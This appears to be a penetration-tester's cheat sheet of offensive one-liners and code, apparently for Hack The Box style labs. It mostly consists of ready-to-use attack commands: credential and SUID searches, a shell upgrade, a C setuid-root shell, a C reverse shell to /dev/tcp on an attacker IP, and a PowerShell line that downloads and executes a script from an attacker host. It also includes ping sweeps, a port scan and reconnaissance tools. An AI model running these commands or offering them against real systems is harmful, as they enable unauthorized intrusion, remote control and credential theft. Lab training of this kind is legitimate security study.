General

• To find stuff in Windows and Linux

dir *flag*.* /s
Grep -rnw /path/to/look  -e /file/to/look
find / 2>/dev/null | grep user.txt
find / -group admin -type f 2>/dev/null

grep -ri "password" /path/to/folder
findstr /s /i /n "password" *.*

• find which programs have SUID of at least 4000

find / -perm /4000 -print 2>/dev/null
find / -perm /4000 -exec ls -l {} \; 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null

• Upgrade shell

# Spawn a TTY shell
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Suspend shell (Ctrl+Z), then on your local machine:
stty raw -echo; fg

# Back in remote shell:
export TERM=xterm

# Adjust to your terminal size
stty rows <rows> cols <cols>

• To give bin/bash shell

python -c 'import pty;pty.spawn("/bin/bash")'
Or 
/bin/bash -i

• C/C++ code for the shell (Linux)

// for shell via executable
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}

// for rev shell
#include <stdlib.h>

int main() {
	system("bash -c 'bash -i >& /dev/tcp/$YOUR_IP/$PORT 0>&1'"); //Executes a reverse shell
	return 0;
}

• for installing anything in python env

└─$ python3 -m venv venv && source venv/bin/activate

• custom wordlist

cewl http://10.10.110.100:65000/wordpress/index.php/languages-and-frameworks >> words.txt

• Download on Windows if wget is not working

iex (New-Object Net.WebClient).DownloadString('http://10.10.14.11:80/winPEAS.ps1')

• Ping sweep

#linux
for i in {1..255}; do (ping -c 1 192.168.1.${i} | grep "bytes from" &); done

#windows
(for /L %a IN (1,1,254) DO ping /n 1 /w 1 172.16.2.%a) | find "Reply"
1..254 | ?{ Test-Connection -Count 1 -Quiet ("192.168.210.$_") } | %{"192.168.210.$_"}

• Port scan

for i in {1..65535}; do (echo > /dev/tcp/192.168.1.1/$i) >/dev/null 2>&1 && echo $i is open; done

• network

└─$ cat listening_ports.ps1 
$nets = netstat -ano | Select-String LISTENING
foreach ($n in $nets) {
    $p = $n -replace ' +', ' '
    $nar = $p.Split(' ')
    try {
        $proc = Get-Process -Id $nar[-1]
        $pname = $proc.ProcessName
        $ppath = $proc.Path
        $n -replace "$($nar[-1])", "$ppath $pname"
    } catch {
        "$n (Process not found)"
    }
}

• Whatweb

whatweb 10.10.10.121
whatweb --no-errors 10.10.10.0/24
whatweb -v -a 3 university.htb

• Banner Grabbing / Web Server Headers

curl -IL https://www.inlanefreight.com

• krb5.conf template

└─$ cat krb5.conf 
[libdefaults]
    dns_lookup_kdc = false
    dns_lookup_realm = false
    default_realm = MIRAGE.HTB

[realms]
    MIRAGE.HTB = {
        kdc = dc01.mirage.htb
        admin_server = dc01.mirage.htb
        default_domain = mirage.htb
    }

[domain_realm]
    .mirage.htb = MIRAGE.HTB
    mirage.htb = MIRAGE.HTB

• Set default_realm to the one you're targeting (e.g., MIRAGE.HTB)

• Use the correct FQDN (dc01.mirage.htb) as KDC and admin_server

• WAF check

wafw00f inlanefreight.com